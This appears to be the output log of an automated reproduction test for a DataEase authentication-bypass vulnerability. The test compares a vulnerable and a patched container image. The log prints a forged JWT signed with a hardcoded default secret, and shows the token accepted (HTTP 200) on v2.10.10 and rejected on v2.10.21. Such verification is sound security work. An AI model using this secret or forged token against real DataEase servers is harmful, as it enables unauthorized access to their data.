[+] Forged JWT (secret=MD5(DataEase@123456)): eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJ1aWQiOiAxLCAib2lkIjogMX0.lNnrI848YK8iGC4knd5eBCKFWEJepijeUxdJ_CJoPOo
[+] Setting up MySQL...
[+] Waiting for MySQL.......... OK

========================================
 Testing vulnerable (registry.cn-qingdao.aliyuncs.com/dataease/dataease:v2.10.10)
========================================
[+] Waiting for app at http://127.0.0.1:8100/de2api/user/personInfo........................ OK (401)
[+] Anonymous baseline (no token):
    HTTP 401
[+] Attack with forged JWT:
    HTTP 200
[+] vulnerable test PASSED

========================================
 Testing fixed (registry.cn-qingdao.aliyuncs.com/dataease/dataease:v2.10.21)
========================================
[+] Waiting for app at http://127.0.0.1:8100/de2api/user/personInfo.................. OK (401)
[+] Anonymous baseline (no token):
    HTTP 401
[+] Attack with forged JWT:
    HTTP 401
[+] fixed test PASSED

========================================
 ALL TESTS PASSED
========================================
Artifacts saved to /root/.pruva/runs/cve-2026-23958_20260525-214431/logs/
[+] Cleaning up containers...